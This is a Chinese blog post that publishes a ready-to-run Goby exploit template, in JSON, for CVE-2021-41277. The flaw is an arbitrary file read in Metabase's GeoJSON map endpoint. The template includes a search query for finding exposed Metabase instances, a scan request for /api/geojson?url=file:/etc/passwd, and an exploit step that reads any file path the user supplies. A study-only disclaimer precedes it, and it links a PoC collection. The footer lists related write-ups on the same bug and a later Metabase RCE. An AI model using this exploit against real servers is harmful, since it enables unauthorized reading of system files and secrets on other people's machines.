Metabase geojson 任意文件读取漏洞 CVE-2021-41277

最新推荐文章于 2025-06-12 08:14:43 发布
最新推荐文章于 2025-06-12 08:14:43 发布
阅读量5.3k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: exp 文章标签: goby exp CVE-2021-26084 metabase
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cch139745/article/details/121454171
Metabase存在一个安全问题,在自定义GeoJSON地图功能中可能会导致本地文件包含漏洞。该漏洞允许攻击者通过未验证的URL加载来读取系统文件。已发布修复版本0.40.5及1.40.5。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2021-41277 goby exp

声明

本程序仅供于学习交流,请使用者遵守《中华人民共和国网络安全法》,勿将此脚本用于非授权的测试,脚本开发者不负任何连带法律责任。

代码

{
      "Name": "Metabase Geojson Arbitrary File Read CVE-2021-41277",
      "Level": "3",
      "Tags": [
            "fileread"
      ],
      "GobyQuery": "(app=\"Metabase\" | title=\"Metabase\" | body=\"Metabase\")",
      "Description": "Metabase is an open source data analytics platform. In affected versions a security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded. This issue is fixed in a new maintenance release (0.40.5 and 1.40.5), and any subsequent release after that. If you’re unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.",
      "Product": "Metabase",
      "Homepage": "https://www.metabase.com/",
      "Author": "aetkrad",
      "Impact": "",
      "Recommendation": "",
      "References": [
            "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486238&idx=1&sn=0eea83880942b16975335739e1db5aa2"
      ],
      "HasExp": true,
      "ExpParams": [
            {
                  "Name": "Path",
                  "Type": "input",
                  "Value": "/etc/passwd"
            }
      ],
      "ExpTips": {
            "Type": "",
            "Content": ""
      },
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/api/geojson?url=file:/etc/passwd",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "/root:/bin/ash",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody||"
                  ]
            }
      ],
      "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/api/geojson?url=file:{{{Path}}}",
                        "follow_redirect": false,
                        "header": null,
                        "data_type": "text",
                        "data": "",
                        "set_variable": []
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody||"
                  ]
            }
      ],
      "PostTime": "2021-11-21 15:03:56",
      "GobyVersion": "1.8.302"
}

poc集合

地址:https://github.com/aetkrad/goby_poc
帮助到你的话给个星吧!

Metabase 敏感信息泄露漏洞复现(CVE-2021-41277
千寻的博客
12-20 1989
文章目录漏洞描述漏洞编号FOFA 查询影响范围修复版本:环境搭建漏洞复现漏洞修复摘抄 漏洞描述 metabase 是一个简单、开源的数据分析平台。 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证 攻击者可通过该漏洞获得敏感信息。 漏洞编号 CVE-2021-41277 FOFA 查询 app=”metabase” 影响范围 metabase version &lt
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
李火火的安全圈
08-03 6445
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器上执行任意命令。
Metabase geojson任意文件读取漏洞CVE-2021-41277
qq_23003811的博客
07-15 409
四、漏洞复现,访问/api/geojson?url=file:/etc/passwd,flag在这:/api/geojson?Metabase 是一个开源数据分析平台。在受影响的版本中,已发现自定义 GeoJSON 地图()支持和潜在的本地文件包含(包括环境变量)存在安全问题,URL 在加载之前未经过验证。1、FOFA查询语句:app="metabase"
Metabase远程文件读取漏洞分析与CTF实战
最新发布
Liu_Bruce的博客
06-12 1495
Metabase开源数据分析平台在0.40.0-0.40.4版本存在远程文件读取漏洞(CVE-2021-41277),本文详细分析了该漏洞的原理、利用方式及修复方案。漏洞源于GeoJSON URL验证缺陷,允许通过file://协议读取系统文件。实战演示了如何获取/etc/passwd和/proc/self/environ等敏感信息。修复建议包括升级版本、添加协议白名单验证和限制文件访问权限。文章强调了输入验证和最小权限原则的重要性,为开发人员和安全研究人员提供了宝贵的安全实践参考。
Metabase任意文件读取漏洞CVE-2021-41277
一枚不知名的Java程序猿
10-03 1824
CVE-2021-41277漏洞复现
CVE-2021-41277——Metabase 信息泄露漏洞
热门推荐
LiBai'S BLOG
11-21 1万+
Metabase 信息泄露漏洞漏洞简介FOFA语法EXP漏洞测试漏洞修复 漏洞简介 Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 CNNVD编号:CNNVD-202111-1565 危害等级: 超危 CVE编号: CVE-2021-41277 FOFA语法 app="Metabase
CVE-2021-41277(metebase信息泄漏漏洞复现)
haoaaao的博客
04-26 2028
0x00 前置知识 1、metebase metabase是一款开源的BI分析工具,开发语言clojure+React为主、也有高阶的收费版。 官网:Metabase | Business Intelligence, Dashboards, and Data Visualization可以利用Metabase进行数据分析,数据可视化,报表生成等。 Metabase介绍_Sshine___的博客-CSDN博客_metabase 2、影响版本: metabase v...
复现vulhub中Metabase任意文件读取漏洞CVE-2021-41277
YX_zjp的博客
04-30 667
Metabase是一个开源的数据分析平台。在其0.40.0到0.40.4、1.0.0 <= Metabase version < 1.40.5版本中,GeoJSON URL验证功能存在远程文件读取漏洞,未授权的攻击者可以利用这个漏洞读取服务器上的任意文件,包括环境变量等。系统:ubuntu20.04。
利用CVE-2021-40444漏洞钓鱼执法上线MSF
include_voidmain的博客
03-31 3453
0x01 漏洞描述 2021年9月8日,微软官方发布了关于MSHTML组件的风险通告(漏洞编号:CVE-2021-40444),未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。 Microsoft 发现,存在尝试通过特别设计的 Microsoft Office 文档利用此漏洞的针对性攻击。攻击者可制作一个由托管浏览器呈现引擎的 Microsoft Office 文档使用的恶意 ActiveX 控件。然后,攻击者必须诱使用户打开此恶意文件。 0x02 漏洞
Metabase 存在任意文件读取漏洞
nnn2188185的博客
04-28 470
Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。
Metabase CVE-2021-41277 信息泄露漏洞复现
小小猪的博客
12-04 541
Metabase CVE-2021-41277 信息泄露漏洞复现 漏洞简介: Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。 FOFA搜索app="Metabase": POC {{BaseURL}}/api/geojson?url=file:/etc/passwd .
cve_2021_41277
qq_53086690的博客
11-21 634
cve_2021_41277 Metabase概述 Metabase可以帮助你把数据库中的数据更好的呈现给更多人,数据分析人员通过建立一个”查询“(Metabase中定义为Question)来提炼数据,再通过仪表盘(Dashboards)来组合展示给公司成员 漏洞影响版本 metabase version < 0.40.5 metabase version >= 1.0.0, < 1.40.5 漏洞概述 该漏洞的某个地址存在未授权访问,并且能够进行任意文件读取 漏洞复现 对存在该漏洞
metabase-cve_2021_41277
m0_49025459的博客
12-26 335
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase 中存在信息泄露漏洞,该漏洞源于产品的 admin->settings->maps->custom maps->add a map 操作缺少权限验证。攻击者可通过该漏洞获得敏感信息。CNNVD编号:CNNVD-202111-1565危害等级: 超危CVE编号: CVE-2021-41277
漏洞分析|Metabase 代码执行漏洞CVE-2023-38646):H2 JDBC 深入利用
m0_46699477的博客
07-28 2355
利用 TRIGGER + DefineClass 完整的实现了 JAVA 代码执行和漏洞回显。
Metabase 信息泄露漏洞CVE-2021-41277)——漏洞复现
W小哥
11-24 3641
一、漏洞简介 metabase 是一个简单、开源的数据分析平台。 CVE-2021-41277 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息。 该漏洞CVSS评分:9.9,危害等级:严重 二、影响版本 影响版本: metabase version < 0.40.5 metabase version >= 1.0.0, < 1
【vulhub系列】CVE-2021-41277 Metabase 信息泄露漏洞复现
Wiofgb的博客
10-01 1212
CVE-2021-41277 Metabase 信息泄露漏洞复现
漏洞复现-Metabase 远程代码执行漏洞(CVE-2023-38646)
玄道的网安博客
08-12 2035
根据pyn3rd师傅分享的https://blog.pyn3rd.com/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/可以知道,可以通过以下三种方式攻击H2数据库。,按照官方预设的流程,一般来说其只能存在一次,在安装结束之后便会清除,但是官方完成安装后移除setup-token 这个重要的的操作给移除了。是Java中用于执行脚本的引擎,只要代码的最开头是 //javascript ,就会被认为是JavaScript脚本,并编译和执行。利用时不需要身份验证。
IDEA DataGrip连接sqlserver 提示驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接的解决方法
qq_53058639的博客
02-23 1163
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
开源BI分析工具 Metabase 中存在远程代码执行漏洞,未完全修复
smellycat000的专栏
07-28 449
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士在商业情报 (BI) 领域,开源工具 Metabase 以无缝的数据解释能力占据一席之地。该自助服务BI工具已用于全球各地的组织机构中,赋能用户提出数据问题并获得可视化的、易于理解的答案。Metabase 的设计对用户友好,无需了解SQL或其它编程语言的知识,扩宽了组织机构中的可用性。Metabase 与多种数据来源相连,如关系数据库、云存储和平...
使用Metabase-datomic驱动实现Datomic数据可视化
压缩包子文件文件名称列表: metabase-datomic-master 知识点: - "metabase-datomic-master"指示了所涉及的Git仓库分支名。在Git版本控制中,"master"通常指的是项目的主分支,尽管现在越来越多的项目采用默认分支...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值